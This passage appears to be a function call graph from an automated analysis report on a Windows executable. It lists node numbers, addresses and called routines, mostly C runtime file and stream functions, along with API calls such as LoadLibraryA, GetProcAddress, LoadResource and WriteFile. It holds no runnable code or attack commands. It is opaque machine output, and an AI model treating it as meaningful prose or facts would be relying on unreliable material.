97968->97971 97970->97966 97970->97967 97970->97971 97971->97753 97973 345045 85 API calls 97972->97973 97974 3a9673 97973->97974 98336 3a97dd 97974->98336 97977 34506b 74 API calls 97978 3a96a0 97977->97978 97979 34506b 74 API calls 97978->97979 97980 3a96b0 97979->97980 97981 34506b 74 API calls 97980->97981 97982 3a96cb 97981->97982 97983 34506b 74 API calls 97982->97983 97984 3a96e6 97983->97984 97985 345045 85 API calls 97984->97985 97986 3a96fd 97985->97986 97987 36588c _W_store_winword 58 API calls 97986->97987 97988 3a9704 97987->97988 97989 36588c _W_store_winword 58 API calls 97988->97989 97990 3a970e 97989->97990 97991 34506b 74 API calls 97990->97991 97992 3a9722 97991->97992 97993 3a91b2 GetSystemTimeAsFileTime 97992->97993 97994 3a9735 97993->97994 97995 3a974a 97994->97995 97996 3a975f 97994->97996 97999 362ed5 _free 58 API calls 97995->97999 97997 3a97c4 97996->97997 97998 3a9765 97996->97998 98001 362ed5 _free 58 API calls 97997->98001 98342 3a8baf 116 API calls __fcloseall 97998->98342 98002 3a9750 97999->98002 98004 37d2f1 98001->98004 98005 362ed5 _free 58 API calls 98002->98005 98003 3a97bc 98006 362ed5 _free 58 API calls 98003->98006 98004->97690 98007 344faa 98004->98007 98005->98004 98006->98004 98008 344fb4 98007->98008 98009 344fbb 98007->98009 98343 365516 98008->98343 98011 344fca 98009->98011 98012 344fdb FreeLibrary 98009->98012 98011->97690 98012->98011 98014 347faf 59 API calls 98013->98014 98015 347b5d 98014->98015 98015->97895 98017 343f92 98016->98017 98021 343fb4 _memmove 98016->98021 98019 360f36 Mailbox 59 API calls 98017->98019 98018 360f36 Mailbox 59 API calls 98020 343fc8 98018->98020 98019->98021 98020->97898 98021->98018 98071 344d61 98022->98071 98025 344d3a 98027 344d53 98025->98027 98028 344d4a FreeLibrary 98025->98028 98026 344d61 2 API calls 98026->98025 98029 3653cb 98027->98029 98028->98027 98075 3653e0 98029->98075 98031 344f5c 98031->97910 98031->97911 98235 344d94 98032->98235 98035 344d94 2 API calls 98038 344ced 98035->98038 98036 344cff FreeLibrary 98037 344d08 98036->98037 98039 344dd0 98037->98039 98038->98036 98038->98037 98040 360f36 Mailbox 59 API calls 98039->98040 98041 344de5 98040->98041 98239 34538e 98041->98239 98043 344df1 _memmove 98044 344e2c 98043->98044 98046 344f21 98043->98046 98047 344ee9 98043->98047 98045 345027 69 API calls 98044->98045 98054 344e35 98045->98054 98253 3a99c4 95 API calls 98046->98253 98242 344fe9 CreateStreamOnHGlobal 98047->98242 98050 34506b 74 API calls 98050->98054 98052 344ec9 98052->97919 98053 37dc00 98055 345045 85 API calls 98053->98055 98054->98050 98054->98052 98054->98053 98248 345045 98054->98248 98056 37dc14 98055->98056 98057 34506b 74 API calls 98056->98057 98057->98052 98059 37dd26 98058->98059 98060 34507d 98058->98060 98277 365752 98060->98277 98063 3a91b2 98297 3a9008 98063->98297 98065 3a91c8 98065->97926 98067 345036 98066->98067 98068 37dce9 98066->98068 98302 365dd0 98067->98302 98070 34503e 98070->97928 98072 344d2e 98071->98072 98073 344d6a LoadLibraryA 98071->98073 98072->98025 98072->98026 98073->98072 98074 344d7b GetProcAddress 98073->98074 98074->98072 98078 3653ec __getstream 98075->98078 98076 3653ff 98124 368ca8 58 API calls __getptd_noexit 98076->98124 98078->98076 98080 365430 98078->98080 98079 365404 98125 368f36 9 API calls __filbuf 98079->98125 98094 370668 98080->98094 98083 365435 98084 36543e 98083->98084 98085 36544b 98083->98085 98126 368ca8 58 API calls __getptd_noexit 98084->98126 98087 365475 98085->98087 98088 365455 98085->98088 98109 370787 98087->98109 98127 368ca8 58 API calls __getptd_noexit 98088->98127 98091 36540f @_EH4_CallFilterFunc@8 __getstream 98091->98031 98095 370674 __getstream 98094->98095 98096 369d8b __lock 58 API calls 98095->98096 98097 370682 98096->98097 98098 3706fd 98097->98098 98103 369e13 __mtinitlocknum 58 API calls 98097->98103 98107 3706f6 98097->98107 98132 366dcd 59 API calls __lock 98097->98132 98133 366e37 LeaveCriticalSection LeaveCriticalSection _doexit 98097->98133 98134 36899d 58 API calls 2 library calls 98098->98134 98101 370704 98101->98107 98135 369fab InitializeCriticalSectionAndSpinCount 98101->98135 98103->98097 98105 370773 __getstream 98105->98083 98106 37072a EnterCriticalSection 98106->98107 98129 37077e 98107->98129 98111 3707a7 __wopenfile 98109->98111 98110 3707c1 98140 368ca8 58 API calls __getptd_noexit 98110->98140 98111->98110 98123 37097c 98111->98123 98142 36394b 60 API calls 2 library calls 98111->98142 98113 3707c6 98141 368f36 9 API calls __filbuf 98113->98141 98115 365480 98128 3654a2 LeaveCriticalSection LeaveCriticalSection _fprintf 98115->98128 98116 3709df 98137 378721 98116->98137 98119 370975 98119->98123 98143 36394b 60 API calls 2 library calls 98119->98143 98121 370994 98121->98123 98144 36394b 60 API calls 2 library calls 98121->98144 98123->98110 98123->98116 98124->98079 98125->98091 98126->98091 98127->98091 98128->98091 98136 369ef5 LeaveCriticalSection 98129->98136 98131 370785 98131->98105 98132->98097 98133->98097 98134->98101 98135->98106 98136->98131 98145 377f05 98137->98145 98139 37873a 98139->98115 98140->98113 98141->98115 98142->98119 98143->98121 98144->98123 98146 377f11 __getstream 98145->98146 98147 377f27 98146->98147 98150 377f5d 98146->98150 98232 368ca8 58 API calls __getptd_noexit 98147->98232 98149 377f2c 98233 368f36 9 API calls __filbuf 98149->98233 98156 377fce 98150->98156 98153 377f79 98234 377fa2 LeaveCriticalSection __unlock_fhandle 98153->98234 98155 377f36 __getstream 98155->98139 98157 377fee 98156->98157 98158 36465a __wsopen_nolock 58 API calls 98157->98158 98162 37800a 98158->98162 98159 378141 98160 368f46 __invoke_watson 8 API calls 98159->98160 98161 378720 98160->98161 98163 377f05 __wsopen_helper 103 API calls 98161->98163 98162->98159 98164 378044 98162->98164 98170 378067 98162->98170 98165 37873a 98163->98165 98166 368c74 __write 58 API calls 98164->98166 98165->98153 98167 378049 98166->98167 98168 368ca8 __filbuf 58 API calls 98167->98168 98169 378056 98168->98169 98172 368f36 __filbuf 9 API calls 98169->98172 98171 378125 98170->98171 98178 378103 98170->98178 98173 368c74 __write 58 API calls 98171->98173 98174 378060 98172->98174 98175 37812a 98173->98175 98174->98153 98176 368ca8 __filbuf 58 API calls 98175->98176 98177 378137 98176->98177 98179 368f36 __filbuf 9 API calls 98177->98179 98180 36d414 __alloc_osfhnd 61 API calls 98178->98180 98179->98159 98181 3781d1 98180->98181 98182 3781fe 98181->98182 98183 3781db 98181->98183 98184 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98182->98184 98185 368c74 __write 58 API calls 98183->98185 98195 378220 98184->98195 98186 3781e0 98185->98186 98188 368ca8 __filbuf 58 API calls 98186->98188 98187 37829e GetFileType 98190 3782eb 98187->98190 98191 3782a9 GetLastError 98187->98191 98189 3781ea 98188->98189 98193 368ca8 __filbuf 58 API calls 98189->98193 98202 36d6aa __set_osfhnd 59 API calls 98190->98202 98194 368c87 __dosmaperr 58 API calls 98191->98194 98192 37826c GetLastError 98196 368c87 __dosmaperr 58 API calls 98192->98196 98193->98174 98197 3782d0 CloseHandle 98194->98197 98195->98187 98195->98192 98198 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98195->98198 98199 378291 98196->98199 98197->98199 98200 3782de 98197->98200 98201 378261 98198->98201 98203 368ca8 __filbuf 58 API calls 98199->98203 98204 368ca8 __filbuf 58 API calls 98200->98204 98201->98187 98201->98192 98207 378309 98202->98207 98203->98159 98205 3782e3 98204->98205 98205->98199 98206 3784c4 98206->98159 98209 378697 CloseHandle 98206->98209 98207->98206 98208 371a41 __lseeki64_nolock 60 API calls 98207->98208 98222 37838a 98207->98222 98210 378373 98208->98210 98211 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98209->98211 98213 368c74 __write 58 API calls 98210->98213 98216 378392 98210->98216 98212 3786be 98211->98212 98214 3786c6 GetLastError 98212->98214 98223 37854e 98212->98223 98213->98222 98215 368c87 __dosmaperr 58 API calls 98214->98215 98217 3786d2 98215->98217 98218 370c5d __close_nolock 61 API calls 98216->98218 98219 370fdb 70 API calls __read_nolock 98216->98219 98220 379922 __chsize_nolock 82 API calls 98216->98220 98216->98222 98225 378541 98216->98225 98228 37852a 98216->98228 98230 371a41 60 API calls __lseeki64_nolock 98216->98230 98221 36d5bd __free_osfhnd 59 API calls 98217->98221 98218->98216 98219->98216 98220->98216 98221->98223 98222->98206 98222->98216 98224 36da06 __write 78 API calls 98222->98224 98226 371a41 60 API calls __lseeki64_nolock 98222->98226 98223->98159 98224->98222 98227 370c5d __close_nolock 61 API calls 98225->98227 98226->98222 98229 378548 98227->98229 98228->98206 98231 368ca8 __filbuf 58 API calls 98229->98231 98230->98216 98231->98223 98232->98149 98233->98155 98234->98155 98236 344ce1 98235->98236 98237 344d9d LoadLibraryA 98235->98237 98236->98035 98236->98038 98237->98236 98238 344dae GetProcAddress 98237->98238 98238->98236 98240 360f36 Mailbox 59 API calls 98239->98240 98241 3453a0 98240->98241 98241->98043 98243 345003 FindResourceExW 98242->98243 98244 345020 98242->98244 98243->98244 98245 37dc8c LoadResource 98243->98245 98244->98044 98245->98244 98246 37dca1 SizeofResource 98245->98246 98246->98244 98247 37dcb5 LockResource 98246->98247 98247->98244 98249 345054 98248->98249 98250 37dd04 98248->98250 98254 3659bd 98249->98254 98252 345062 98252->98054 98253->98044 98257 3659c9 __getstream 98254->98257 98255 3659db 98267 368ca8 58 API calls __getptd_noexit 98255->98267 98257->98255 98258 365a01 98257->98258 98269 366d8e 98258->98269 98260 3659e0 98268 368f36 9 API calls __filbuf 98260->98268 98261 365a07 98275 36592e 83 API calls 4 library calls 98261->98275 98264 365a16 98276 365a38 LeaveCriticalSection LeaveCriticalSection _fprintf 98264->98276 98266 3659eb __getstream 98266->98252 98267->98260 98268->98266 98270 366dc0 EnterCriticalSection 98269->98270 98271 366d9e 98269->98271 98273 366db6 98270->98273 98271->98270 98272 366da6 98271->98272 98274 369d8b __lock 58 API calls 98272->98274 98273->98261 98274->98273 98275->98264 98276->98266 98280 36576d 98277->98280 98279 34508e 98279->98063 98281 365779 __getstream 98280->98281 98282 36578f _memset 98281->98282 98283 3657bc 98281->98283 98284 3657b4 __getstream 98281->98284 98293 368ca8 58 API calls __getptd_noexit 98282->98293 98285 366d8e __lock_file 59 API calls 98283->98285 98284->98279 98287 3657c2 98285->98287 98295 36558d 72 API calls 4 library calls 98287->98295 98289 3657a9 98294 368f36 9 API calls __filbuf 98289->98294 98290 3657d8 98296 3657f6 LeaveCriticalSection LeaveCriticalSection _fprintf 98290->98296 98293->98289 98294->98284 98295->98290 98296->98284 98300 36537a GetSystemTimeAsFileTime 98297->98300 98299 3a9017 98299->98065 98301 3653a8 __aulldiv 98300->98301 98301->98299 98303 365ddc __getstream 98302->98303 98304 365e03 98303->98304 98305 365dee 98303->98305 98306 366d8e __lock_file 59 API calls 98304->98306 98316 368ca8 58 API calls __getptd_noexit 98305->98316 98308 365e09 98306->98308 98318 365a40 67 API calls 5 library calls 98308->98318 98309 365df3 98317 368f36 9 API calls __filbuf 98309->98317 98312 365e14 98319 365e34 LeaveCriticalSection LeaveCriticalSection _fprintf 98312->98319 98314 365e26 98315 365dfe __getstream 98314->98315 98315->98070 98316->98309 98317->98315 98318->98312 98319->98314 98320->97935 98321->97948 98322->97950 98323->97947 98324->97956 98326 3492c9 Mailbox 98325->98326 98327 37f4f8 98326->98327 98332 3492d3 98326->98332 98328 360f36 Mailbox 59 API calls 98327->98328 98330 37f504 98328->98330 98329 3492da 98329->97960 98332->98329 98333 349df0 59 API calls Mailbox 98332->98333 98333->98332 98334->97971 98335->97970 98340 3a97f1 __tzset_nolock _wcscmp 98336->98340 98337 3a9685 98337->97977 98337->98004 98338 34506b 74 API calls 98338->98340 98339 3a91b2 GetSystemTimeAsFileTime 98339->98340 98340->98337 98340->98338 98340->98339 98341 345045 85 API calls 98340->98341 98341->98340 98342->98003 98344 365522 __getstream 98343->98344 98345 365536 98344->98345 98346 36554e 98344->98346 98372 368ca8 58 API calls __getptd_noexit 98345->98372 98348 366d8e __lock_file 59 API calls 98346->98348 98352 365546 __getstream 98346->98352 98350 365560 98348->98350 98349 36553b 98373 368f36 9 API calls __filbuf 98349->98373 98356 3654aa 98350->98356 98352->98009 98357 3654cd 98356->98357 98358 3654b9 98356->98358 98370 3654c9 98357->98370 98375 364bad 98357->98375 98418 368ca8 58 API calls __getptd_noexit 98358->98418 98361 3654be 98419 368f36 9 API calls __filbuf 98361->98419 98367 3654e7 98392 370b82 98367->98392 98369 3654ed 98369->98370 98371 362ed5 _free 58 API calls 98369->98371 98374 365585 LeaveCriticalSection LeaveCriticalSection _fprintf 98370->98374 98371->98370 98372->98349 98373->98352 98374->98352 98376 364bc0 98375->98376 98380 364be4 98375->98380 98377 364856 __filbuf 58 API calls 98376->98377 98376->98380 98378 364bdd 98377->98378 98420 36da06 98378->98420 98381 370cf7 98380->98381 98382 3654e1 98381->98382 98383 370d04 98381->98383 98385 364856 98382->98385 98383->98382 98384 362ed5 _free 58 API calls 98383->98384 98384->98382 98386 364875 98385->98386 98387 364860 98385->98387 98386->98367 98555 368ca8 58 API calls __getptd_noexit 98387->98555 98389 364865 98556 368f36 9 API calls __filbuf 98389->98556 98391 364870 98391->98367 98393 370b8e __getstream 98392->98393 98394 370bb2 98393->98394 98395 370b9b 98393->98395 98397 370c3d 98394->98397 98399 370bc2 98394->98399 98572 368c74 58 API calls __getptd_noexit 98395->98572 98577 368c74 58 API calls __getptd_noexit 98397->98577 98398 370ba0 98573 368ca8 58 API calls __getptd_noexit 98398->98573 98402 370be0 98399->98402 98403 370bea 98399->98403 98574 368c74 58 API calls __getptd_noexit 98402->98574 98406 36d386 ___lock_fhandle 59 API calls 98403->98406 98404 370be5 98578 368ca8 58 API calls __getptd_noexit 98404->98578 98408 370bf0 98406->98408 98410 370c03 98408->98410 98411 370c0e 98408->98411 98409 370c49 98579 368f36 9 API calls __filbuf 98409->98579 98557 370c5d 98410->98557 98575 368ca8 58 API calls __getptd_noexit 98411->98575 98412 370ba7 __getstream 98412->98369 98416 370c09 98576 370c35 LeaveCriticalSection __unlock_fhandle 98416->98576 98418->98361 98419->98370 98421 36da12 __getstream 98420->98421 98422 36da36 98421->98422 98423 36da1f 98421->98423 98424 36dad5 98422->98424 98427 36da4a 98422->98427 98521 368c74 58 API calls __getptd_noexit 98423->98521 98527 368c74 58 API calls __getptd_noexit 98424->98527 98426 36da24 98522 368ca8 58 API calls __getptd_noexit 98426->98522 98430 36da72 98427->98430 98431 36da68 98427->98431 98448 36d386 98430->98448 98523 368c74 58 API calls __getptd_noexit 98431->98523 98432 36da6d 98528 368ca8 58 API calls __getptd_noexit 98432->98528 98435 36da78 98437 36da9e 98435->98437 98438 36da8b 98435->98438 98524 368ca8 58 API calls __getptd_noexit 98437->98524 98457 36daf5 98438->98457 98439 36dae1 98529 368f36 9 API calls __filbuf 98439->98529 98441 36da2b __getstream 98441->98380 98444 36daa3 98525 368c74 58 API calls __getptd_noexit 98444->98525 98445 36da97 98526 36dacd LeaveCriticalSection __unlock_fhandle 98445->98526 98449 36d392 __getstream 98448->98449 98450 36d3e1 EnterCriticalSection 98449->98450 98451 369d8b __lock 58 API calls 98449->98451 98452 36d407 __getstream 98450->98452 98453 36d3b7 98451->98453 98452->98435 98454 36d3cf 98453->98454 98530 369fab InitializeCriticalSectionAndSpinCount 98453->98530 98531 36d40b LeaveCriticalSection _doexit 98454->98531 98458 36db02 __write_nolock 98457->98458 98459 36db60 98458->98459 98460 36db41 98458->98460 98488 36db36 98458->98488 98463 36dbb8 98459->98463 98464 36db9c 98459->98464 98541 368c74 58 API calls __getptd_noexit 98460->98541 98461 36c776 __call_reportfault 6 API calls 98465 36e356 98461->98465 98468 36dbd1 98463->98468 98547 371a41 60 API calls 3 library calls 98463->98547 98544 368c74 58 API calls __getptd_noexit 98464->98544 98465->98445 98466 36db46 98542 368ca8 58 API calls __getptd_noexit 98466->98542 98532 375deb 98468->98532 98470 36dba1 98545 368ca8 58 API calls __getptd_noexit 98470->98545 98472 36db4d 98543 368f36 9 API calls __filbuf 98472->98543 98476 36dbdf 98477 36df38 98476->98477 98548 369b2c 58 API calls 2 library calls 98476->98548 98479 36df56 98477->98479 98480 36e2cb WriteFile 98477->98480 98478 36dba8 98546 368f36 9 API calls __filbuf 98478->98546 98483 36e07a 98479->98483 98491 36df6c 98479->98491 98484 36df2b GetLastError 98480->98484 98489 36def8 98480->98489 98495 36e16f 98483->98495 98497 36e085 98483->98497 98484->98489 98485 36dc0b GetConsoleMode 98485->98477 98487 36dc4a 98485->98487 98486 36e304 98486->98488 98553 368ca8 58 API calls __getptd_noexit 98486->98553 98487->98477 98490 36dc5a GetConsoleCP 98487->98490 98488->98461 98489->98486 98489->98488 98494 36e058 98489->98494 98490->98486 98518 36dc89 98490->98518 98491->98486 98492 36dfdb WriteFile 98491->98492 98492->98484 98496 36e018 98492->98496 98499 36e063 98494->98499 98500 36e2fb 98494->98500 98495->98486 98501 36e1e4 WideCharToMultiByte 98495->98501 98496->98491 98502 36e03c 98496->98502 98497->98486 98503 36e0ea WriteFile 98497->98503 98498 36e332 98554 368c74 58 API calls __getptd_noexit 98498->98554 98550 368ca8 58 API calls __getptd_noexit 98499->98550 98552 368c87 58 API calls 3 library calls 98500->98552 98501->98484 98513 36e22b 98501->98513 98502->98489 98503->98484 98505 36e139 98503->98505 98505->98489 98505->98497 98505->98502 98508 36e068 98551 368c74 58 API calls __getptd_noexit 98508->98551 98509 36e233 WriteFile 98512 36e286 GetLastError 98509->98512 98509->98513 98512->98513 98513->98489 98513->98495 98513->98502 98513->98509 98514 377bde WriteConsoleW CreateFileW __putwch_nolock 98519 36dddf 98514->98519 98515 37643a 60 API calls __write_nolock 98515->98518 98516 36dd72 WideCharToMultiByte 98516->98489 98517 36ddad WriteFile 98516->98517 98517->98484 98517->98519 98518->98489 98518->98515 98518->98516 98518->98519 98549 363775 58 API calls __isleadbyte_l 98518->98549 98519->98484 98519->98489 98519->98514 98519->98518 98520 36de07 WriteFile 98519->98520 98520->98484 98520->98519 98521->98426 98522->98441 98523->98432 98524->98444 98525->98445 98526->98441 98527->98432 98528->98439 98529->98441 98530->98454 98531->98450 98533 375df6 98532->98533 98534 375e03 98532->98534 98535 368ca8 __filbuf 58 API calls 98533->98535 98537 375e0f 98534->98537 98538 368ca8 __filbuf 58 API calls 98534->98538 98536 375dfb 98535->98536 98536->98476 98537->98476 98539 375e30 98538->98539 98540 368f36 __filbuf 9 API calls 98539->98540 98540->98536 98541->98466 98542->98472 98543->98488 98544->98470 98545->98478 98546->98488 98547->98468 98548->98485 98549->98518 98550->98508 98551->98488 98552->98488 98553->98498 98554->98488 98555->98389 98556->98391 98580 36d643 98557->98580 98559 370c6b 98560 370cc1 98559->98560 98562 370c9f 98559->98562 98565 36d643 __lseeki64_nolock 58 API calls 98559->98565 98593 36d5bd 59 API calls 2 library calls 98560->98593 98562->98560 98563 36d643 __lseeki64_nolock 58 API calls 98562->98563 98566 370cab CloseHandle 98563->98566 98564 370cc9 98567 370ceb 98564->98567 98594 368c87 58 API calls 3 library calls 98564->98594 98568 370c96 98565->98568 98566->98560 98569 370cb7 GetLastError 98566->98569 98567->98416 98571 36d643 __lseeki64_nolock 58 API calls 98568->98571 98569->98560 98571->98562 98572->98398 98573->98412 98574->98404 98575->98416 98576->98412 98577->98404 98578->98409 98579->98412 98581 36d64e 98580->98581 98583 36d663 98580->98583 98595 368c74 58 API calls __getptd_noexit 98581->98595 98587 36d688 98583->98587 98597 368c74 58 API calls __getptd_noexit 98583->98597 98585 36d653 98596 368ca8 58 API calls __getptd_noexit 98585->98596 98587->98559 98588 36d692 98598 368ca8 58 API calls __getptd_noexit 98588->98598 98589 36d65b 98589->98559 98591 36d69a 98599 368f36 9 API calls __filbuf 98591->98599 98593->98564 98594->98567 98595->98585 98596->98589 98597->98588 98598->98591 98599->98589 98662 371ac0 98600->98662 98603 3448f7 98664 347eec 98603->98664 98604 3448da 98605 347d2c 59 API calls 98604->98605 98607 3448e6 98605->98607 98608 347886 59 API calls 98607->98608 98609 3448f2 98608->98609 98610 360911 98609->98610 98611 371ac0 __write_nolock 98610->98611 98612 36091e GetLongPathNameW 98611->98612 98613 347d2c 59 API calls 98612->98613 98614 34741d 98613->98614 98615 34716b 98614->98615 98616 3477c7 59 API calls 98615->98616 98617 34717d 98616->98617 98618 3448ae 60 API calls 98617->98618 98619 347188 98618->98619 98620 347193 98619->98620 98621 37ebde 98619->98621 98622 343f84 59 API calls 98620->98622 98626 37ebf8 98621->98626 98674 347a68 61 API calls 98621->98674 98624 34719f 98622->98624 98668 3434c2 98624->98668 98627 3471b2 Mailbox 98627->97769 98629 344f3d 136 API calls 98628->98629 98630 3469ef 98629->98630 98631 37e38a 98630->98631 98632 344f3d 136 API calls 98630->98632 98633 3a9604 122 API calls 98631->98633 98634 346a03 98632->98634 98635 37e39f 98633->98635 98634->98631 98636 346a0b 98634->98636 98637 37e3a3 98635->98637 98638 37e3c0 98635->98638 98640 346a17 98636->98640 98641 37e3ab 98636->98641 98642 344faa 84 API calls 98637->98642 98639 360f36 Mailbox 59 API calls 98638->98639 98661 37e405 Mailbox 98639->98661 98675 346bec 98640->98675 98791 3a4339 91 API calls _wprintf 98641->98791 98642->98641 98645 37e3b9 98645->98638 98647 37e5b9 98648 362ed5 _free 58 API calls 98647->98648 98649 37e5c1 98648->98649 98650 344faa 84 API calls 98649->98650 98655 37e5ca 98650->98655 98654 362ed5 _free 58 API calls 98654->98655 98655->98654 98657 344faa 84 API calls 98655->98657 98793 39fad2 90 API calls 4 library calls 98655->98793 98657->98655 98658 347f41 59 API calls 98658->98661 98661->98647 98661->98655 98661->98658 98768 39fa6e 98661->98768 98771 3a7428 98661->98771 98777 34766f 98661->98777 98785 3474bd 98661->98785 98792 39f98f 61 API calls 2 library calls 98661->98792 98663 3448bb GetFullPathNameW 98662->98663 98663->98603 98663->98604 98665 347f06 98664->98665 98667 347ef9 98664->98667 98666 360f36 Mailbox 59 API calls 98665->98666 98666->98667 98667->98607 98669 3434d4 98668->98669 98673 3434f3 _memmove 98668->98673 98671 360f36 Mailbox 59 API calls 98669->98671 98670 360f36 Mailbox 59 API calls 98672 34350a 98670->98672 98671->98673 98672->98627 98673->98670 98674->98621 98676 37e777 98675->98676 98677 346c15 98675->98677 98866 39fad2 90 API calls 4 library calls 98676->98866 98799 345906 60 API calls Mailbox 98677->98799 98680 346c37 98800 345956 67 API calls 98680->98800 98681 37e78a 98867 39fad2 90 API calls 4 library calls 98681->98867 98683 346c4c 98683->98681 98685 346c54 98683->98685 98687 3477c7 59 API calls 98685->98687 98686 37e7a6 98689 346cc1 98686->98689 98688 346c60 98687->98688 98801 360ad7 60 API calls __write_nolock 98688->98801 98691 346ccf 98689->98691 98692 37e7b9 98689->98692 98696 3477c7 59 API calls 98691->98696 98695 345dcf CloseHandle 98692->98695 98693 346c6c 98694 3477c7 59 API calls 98693->98694 98697 346c78 98694->98697 98698 37e7c5 98695->98698 98699 346cd8 98696->98699 98700 3448ae 60 API calls 98697->98700 98701 344f3d 136 API calls 98698->98701 98702 3477c7 59 API calls 98699->98702 98703 346c86 98700->98703 98704 37e7e1 98701->98704 98705 346ce1 98702->98705 98802 3459b0 ReadFile SetFilePointerEx 98703->98802 98707 37e80a 98704->98707 98711 3a9604 122 API calls 98704->98711 98804 3446f9 98705->98804 98868 39fad2 90 API calls 4 library calls 98707->98868 98710 346cb2 98803 345c4e SetFilePointerEx SetFilePointerEx 98710->98803 98715 37e7fd 98711->98715 98712 346cf8 98716 347c8e 59 API calls 98712->98716 98713 37e821 98723 346e6c Mailbox 98713->98723 98718 37e826 98715->98718 98719 37e805 98715->98719 98717 346d09 SetCurrentDirectoryW 98716->98717 98725 346d1c Mailbox 98717->98725 98720 344faa 84 API calls 98718->98720 98721 344faa 84 API calls 98719->98721 98722 37e82b 98720->98722 98721->98707 98724 360f36 Mailbox 59 API calls 98722->98724 98794 345934 98723->98794 98731 37e85f 98724->98731 98727 360f36 Mailbox 59 API calls 98725->98727 98729 346d2f 98727->98729 98728 343bcd 98728->97628 98728->97637 98730 34538e 59 API calls 98729->98730 98732 346d3a Mailbox __wsetenvp 98730->98732 98733 34766f 59 API calls 98731->98733 98734 346e47 98732->98734 98745 37eb32 98732->98745 98752 37eb2a 98732->98752 98755 347f41 59 API calls 98732->98755 98855 3459cd 67 API calls _wcscpy 98732->98855 98856 3470bd GetStringTypeW 98732->98856 98857 34702c 60 API calls __wcsnicmp 98732->98857 98858 34710a GetStringTypeW __wsetenvp 98732->98858 98859 3637bd GetStringTypeW _iswctype 98732->98859 98860 346a3c 166 API calls 3 library calls 98732->98860 98861 347373 59 API calls Mailbox 98732->98861 98763 37e8a8 Mailbox 98733->98763 98862 345dcf 98734->98862 98737 37ea99 98871 3a7388 59 API calls Mailbox 98737->98871 98738 346e53 SetCurrentDirectoryW 98738->98723 98741 37eabb 98872 3af656 59 API calls 2 library calls 98741->98872 98744 37eac8 98746 362ed5 _free 58 API calls 98744->98746 98875 39fad2 90 API calls 4 library calls 98745->98875 98746->98723 98749 34766f 59 API calls 98749->98763 98750 37eb4b 98750->98734 98874 39f928 59 API calls 4 library calls 98752->98874 98755->98732 98756 39fa6e 59 API calls 98756->98763 98758 347f41 59 API calls 98758->98763 98760 3a7428 59 API calls 98760->98763 98762 37eaeb 98873 39fad2 90 API calls 4 library calls 98762->98873 98763->98737 98763->98749 98763->98756 98763->98758 98763->98760 98763->98762 98869 39f98f 61 API calls 2 library calls 98763->98869 98870 347373 59 API calls Mailbox 98763->98870 98765 37eb04 98766 362ed5 _free 58 API calls 98765->98766 98767 37eb17 98766->98767 98767->98723 98769 360f36 Mailbox 59 API calls 98768->98769 98770 39fa9e _memmove 98769->98770 98770->98661 98770->98770 98772 3a7433 98771->98772 98773 360f36 Mailbox 59 API calls 98772->98773 98774 3a744a 98773->98774 98775 347f41 59 API calls 98774->98775 98776 3a7459 98774->98776 98775->98776 98776->98661 98778 34770f 98777->98778 98781 347682 _memmove 98777->98781 98780 360f36 Mailbox 59 API calls 98778->98780 98779 360f36 Mailbox 59 API calls 98782 347689 98779->98782 98780->98781 98781->98779 98783 360f36 Mailbox 59 API calls 98782->98783 98784 3476b2 98782->98784 98783->98784 98784->98661 98786 3474d0 98785->98786 98788 34757e 98785->98788 98787 360f36 Mailbox 59 API calls 98786->98787 98790 347502 98786->98790 98787->98790 98788->98661 98789 360f36 59 API calls Mailbox 98789->98790 98790->98788 98790->98789 98791->98645 98792->98661 98793->98655 98795 345dcf CloseHandle 98794->98795 98796 34593c Mailbox 98795->98796 98797 345dcf CloseHandle 98796->98797 98798 34594b 98797->98798 98798->98728 98799->98680 98800->98683 98801->98693 98802->98710 98803->98689 98805 3477c7 59 API calls 98804->98805 98806 34470f 98805->98806 98807 3477c7 59 API calls 98806->98807 98808 344717 98807->98808 98809 3477c7 59 API calls 98808->98809 98810 34471f 98809->98810 98811 3477c7 59 API calls 98810->98811 98812 344727 98811->98812 98813 37d82b 98812->98813 98814 34475b 98812->98814 98815 3481a7 59 API calls 98813->98815 98816 3479ab 59 API calls 98814->98816 98817 37d834 98815->98817 98818 344769 98816->98818 98819 347eec 59 API calls 98817->98819 98820 347e8c 59 API calls 98818->98820 98823 34479e 98819->98823 98821 344773 98820->98821 98821->98823 98824 3479ab 59 API calls 98821->98824 98822 3447de 98876 3479ab 98822->98876 98823->98822 98825 3447bd 98823->98825 98837 37d854 98823->98837 98826 344794 98824->98826 98830 347b52 59 API calls 98825->98830 98829 347e8c 59 API calls 98826->98829 98828 37d924 98832 347d2c 59 API calls 98828->98832 98829->98823 98833 3447c7 98830->98833 98831 3447ef 98834 344801 98831->98834 98835 3481a7 59 API calls 98831->98835 98844 37d8e1 98832->98844 98833->98822 98841 3479ab 59 API calls 98833->98841 98836 344811 98834->98836 98838 3481a7 59 API calls 98834->98838 98835->98834 98840 344818 98836->98840 98842 3481a7 59 API calls 98836->98842 98837->98828 98839 37d90d 98837->98839 98845 37d88b 98837->98845 98838->98836 98839->98828 98846 37d8f8 98839->98846 98843 3481a7 59 API calls 98840->98843 98852 34481f Mailbox 98840->98852 98841->98822 98842->98840 98843->98852 98844->98822 98850 347b52 59 API calls 98844->98850 98889 347a84 59 API calls 2 library calls 98844->98889 98847 37d8e9 98845->98847 98853 37d8d4 98845->98853 98849 347d2c 59 API calls 98846->98849 98848 347d2c 59 API calls 98847->98848 98848->98844 98849->98844 98850->98844 98852->98712 98854 347d2c 59 API calls 98853->98854 98854->98844 98855->98732 98856->98732 98857->98732 98858->98732 98859->98732 98860->98732 98861->98732 98863 345de8 98862->98863 98864 345dd9 98862->98864 98863->98864 98865 345ded CloseHandle 98863->98865 98864->98738 98865->98864 98866->98681 98867->98686 98868->98713 98869->98763 98870->98763 98871->98741 98872->98744 98873->98765 98874->98745 98875->98750 98877 347a17 98876->98877 98878 3479ba 98876->98878 98879 347e8c 59 API calls 98877->98879 98878->98877 98880 3479c5 98878->98880 98885 3479e8 _memmove 98879->98885 98881 3479e0 98880->98881 98882 37ee62 98880->98882 98890 348087 59 API calls Mailbox 98881->98890 98891 348189 59 API calls Mailbox 98882->98891 98885->98831 98886 37ee6c 98887 360f36 Mailbox 59 API calls 98886->98887 98888 37ee8c 98887->98888 98889->98844 98890->98885 98891->98886 98893 346ef5 98892->98893 98897 347009 98892->98897 98894 360f36 Mailbox 59 API calls 98893->98894 98893->98897 98896 346f1c 98894->98896 98895 360f36 Mailbox 59 API calls 98902 346f91 98895->98902 98896->98895 98897->97775 98900 3474bd 